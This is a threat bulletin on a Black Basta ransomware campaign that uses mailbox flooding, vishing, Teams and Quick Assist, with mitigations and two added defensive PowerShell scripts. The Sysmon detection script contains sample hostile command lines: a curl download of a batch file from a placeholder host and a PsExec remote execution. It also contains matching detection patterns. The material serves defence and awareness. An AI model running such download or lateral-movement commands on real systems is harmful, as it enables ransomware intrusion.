Since December 16, 2024, Arctic Wolf has observed increased activity in a social engineering campaign associated with Black Basta ransomware. In this campaign, threat actors were observed using Microsoft Quick Assist and Teams to impersonate IT personnel and engage in malicious activities upon contacting victims. This is a continuation of the Black Basta campaign we reported on in a security bulletin sent in June 2024.
Black Basta is a ransomware group known for using double extortion tactics, where sensitive information is exfiltrated as well as encrypted to pressure victims into paying. In some cases, people working with the group have harassed victims over the phone to try to pressure them into paying a ransom. Black Basta was first observed in December 2022.
Arctic Wolf has multiple detections in place for common activities observed in this and other related ransomware campaigns. To protect against this campaign, Arctic Wolf strongly recommends reviewing the campaign details and recommendations below.
Campaign Details
In some instances, Black Basta affiliates have been known to use Microsoft Teams to reach target users. Threat actors use Microsoft Teams to send messages and make calls, pretending to be IT or help desk staff.
In most instances, threat actors were observed flooding victim mailboxes with spam email from subscription services. They would then call the victims in a voice phishing (vishing) attack, posing as IT support under the pretext of helping to resolve the email flood.
Typically, threat actors in this campaign attempted to persuade victims to provide remote access to their workstations through Quick Assist (a remote access tool built into Microsoft Windows). This is accomplished by having the victim enter a security code and grant permissions for their device to be controlled remotely.
Once given remote access, threat actors were observed executing scripts with cURL commands to download batch or ZIP files and delivering malicious payloads such as EvilProxy, SystemBC, Qakbot, ScreenConnect, NetSupport Manager, and Cobalt Strike.
Having established persistence with these tools, threat actors were observed conducting domain enumeration, extracting credentials, moving laterally, and using PsExec to deploy Black Basta ransomware throughout victim environments.
Recommendations
Uninstall Quick Assist and/or Other RMM Tools if Not Utilized in Your Environment
If your organization does not utilize Quick Assist and/or any other remote support tools, Arctic Wolf strongly recommends disabling or uninstalling them. This prevents external threat actors from exploiting these tools to gain unauthorized access to your devices.
- Disabling Quick Assist
  - To disable Quick Assist, block traffic to the https://remoteassistance.support.services.microsoft.com endpoint. This is the primary endpoint used by Quick Assist to establish a session; once it is blocked, Quick Assist can’t be used to get help or to help someone.
- Uninstalling Quick Assist
  - Uninstall via PowerShell – run the following command as Administrator:
    Get-AppxPackage -Name MicrosoftCorporationII.QuickAssist | Remove-AppxPackage -AllUsers
  - Uninstall via Windows Settings – navigate to Settings > Apps > Installed apps > Quick Assist > select the ellipsis (…), then select Uninstall.
Additionally, consider implementing policies to block the installation and use of Quick Assist and other RMM tools unless they have been explicitly approved for use within your environment. This approach helps ensure that only vetted and secure tools are in operation, further safeguarding your systems.
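The following PowerShell script is an added example (not Arctic Wolf's or Microsoft's code) of how the two recommendations above can be checked on a host: it removes Quick Assist when it is not on an approved list and reports any of the remote-access tools named in this bulletin that are installed but not approved. The approved list and the registry uninstall hives it reads are assumptions; adjust both to your environment and run it in an elevated session.

```powershell
# Added example: audit a Windows host for Quick Assist and the remote-access tools
# named in this bulletin (ScreenConnect, NetSupport Manager), and remove Quick
# Assist if it is not approved. Requires an elevated PowerShell session.
# ASSUMPTION: $ApprovedTools is a placeholder; replace it with the tools your
# organization has explicitly sanctioned.
$ApprovedTools = @('ScreenConnect')
# Display-name fragments of the remote-access tools mentioned in the bulletin.
$RmmPatterns = @('ScreenConnect', 'NetSupport')

function Test-Approved([string]$Name) {
    foreach ($a in $ApprovedTools) { if ($Name -like "*$a*") { return $true } }
    return $false
}

function Get-InstalledRmmTools {
    # Walk the 64-bit, 32-bit and per-user uninstall hives and match display names.
    $paths = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*'
    )
    foreach ($entry in (Get-ItemProperty -Path $paths -ErrorAction SilentlyContinue)) {
        $name = $entry.DisplayName
        if (-not $name) { continue }
        foreach ($p in $RmmPatterns) {
            if ($name -like "*$p*") {
                [pscustomobject]@{
                    Tool     = $name
                    Version  = $entry.DisplayVersion
                    Approved = (Test-Approved $name)
                }
                break
            }
        }
    }
}

# Quick Assist ships as an Appx package, so it is checked separately.
$qa = Get-AppxPackage -AllUsers -Name 'MicrosoftCorporationII.QuickAssist'
if (-not $qa) {
    Write-Output 'Quick Assist is not installed.'
} elseif (Test-Approved 'Quick Assist') {
    Write-Output 'Quick Assist is installed and approved; leaving it in place.'
} else {
    Write-Output 'Quick Assist is installed and not approved; removing it for all users.'
    $qa | Remove-AppxPackage -AllUsers
}

Get-InstalledRmmTools | Where-Object { -not $_.Approved } |
    ForEach-Object { Write-Warning "Unapproved remote-access tool present: $($_.Tool) $($_.Version)" }
```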
Install Arctic Wolf Agent & Sysmon
- Arctic Wolf has implemented MDR detections for post-compromise threat activity associated with this campaign on endpoint devices.
- Arctic Wolf Agent and Sysmon give Arctic Wolf the visibility into network and endpoint events needed to identify the tactics, techniques, and tools involved in this campaign.
- For instructions on how to install Arctic Wolf Agent, see the below install guides:
- If you have a supported EDR solution deployed in your environment, please configure it for monitoring with Arctic Wolf.
Note: Arctic Wolf recommends following change management best practices for deploying Agent and Sysmon, including testing changes in a testing environment before deploying to production.
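As an added example (not Arctic Wolf's detection content), the PowerShell below shows the kind of check Sysmon process-creation events (Event ID 1) make possible against the post-access behaviour described in the Campaign Details: cURL fetching batch or ZIP files, PsExec execution, and processes spawned from a Quick Assist session. The sample events are constructed for illustration; the hostname, paths and URL in them are placeholders, and `ConvertFrom-SysmonEvent` is assumed to be fed records from `Get-WinEvent` on a host where Sysmon is installed.

```powershell
# Added example: flag Sysmon Event ID 1 records matching the activity described in
# this bulletin. Field names (Image, CommandLine, ParentImage) are Sysmon's own.
function Test-CampaignIndicator {
    param([string]$Image, [string]$CommandLine, [string]$ParentImage)
    $exe = [IO.Path]::GetFileName($Image).ToLower()
    $cmd = $CommandLine.ToLower()
    # cURL pulling a batch or ZIP file from a remote URL
    if ($exe -eq 'curl.exe' -and $cmd -match 'https?://' -and $cmd -match '\.(bat|zip)\b') {
        return 'curl.exe downloading a batch/ZIP file'
    }
    # PsExec, used in this campaign to deploy the ransomware across the environment
    if ($exe -in @('psexec.exe', 'psexec64.exe', 'psexesvc.exe')) {
        return 'PsExec execution (lateral movement / ransomware deployment)'
    }
    # Anything launched from a Quick Assist session deserves review after a vishing call
    if ([IO.Path]::GetFileName($ParentImage).ToLower() -eq 'quickassist.exe') {
        return 'process spawned from a Quick Assist session'
    }
    return $null
}

# Reduce a live Sysmon record (from Get-WinEvent) to the three fields above.
function ConvertFrom-SysmonEvent($Record) {
    $data = ([xml]$Record.ToXml()).Event.EventData.Data
    $get = { param($n) ($data | Where-Object Name -eq $n).'#text' }
    [pscustomobject]@{
        Image       = & $get 'Image'
        CommandLine = & $get 'CommandLine'
        ParentImage = & $get 'ParentImage'
    }
}

# CONSTRUCTED sample events. On a real host they would come from:
#   Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=1} |
#       ForEach-Object { ConvertFrom-SysmonEvent $_ }
$samples = @(
    [pscustomobject]@{ Image='C:\Windows\System32\curl.exe'; CommandLine='curl.exe -o C:\Users\Public\update.bat http://example.invalid/u.bat'; ParentImage='C:\Windows\System32\cmd.exe' },
    [pscustomobject]@{ Image='C:\Windows\System32\notepad.exe'; CommandLine='notepad.exe'; ParentImage='C:\Windows\explorer.exe' },
    [pscustomobject]@{ Image='C:\Tools\PsExec.exe'; CommandLine='PsExec.exe \\host01 -s cmd /c start.bat'; ParentImage='C:\Windows\System32\cmd.exe' }
)
foreach ($e in $samples) {
    $hit = Test-CampaignIndicator -Image $e.Image -CommandLine $e.CommandLine -ParentImage $e.ParentImage
    if ($hit) { Write-Warning "$hit : $($e.CommandLine)" }
}
```

The first and third samples are flagged; the notepad.exe event is not.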
Implement Comprehensive Security Awareness Training
Black Basta affiliates have successfully socially engineered victims through calls and emails during this ongoing campaign. Arctic Wolf strongly recommends implementing comprehensive security awareness training campaigns. These initiatives are designed to equip users with the skills needed to quickly identify and report suspicious activity, including the tech support scams observed in this campaign.
Arctic Wolf has several vishing modules within our Managed Security Awareness (MSA) product that will help users identify the suspicious activity outlined in this bulletin.
Microsoft Teams Attack Vector Safeguards
Microsoft has provided the following mitigations to protect against attacks leveraging Microsoft Teams:
- Educate Microsoft Teams users to check for the ‘External’ tag on communications from external sources, exercise caution in sharing information, and avoid sharing account details or approving sign-in requests via chat.
- Apply Microsoft’s security best practices for Microsoft Teams.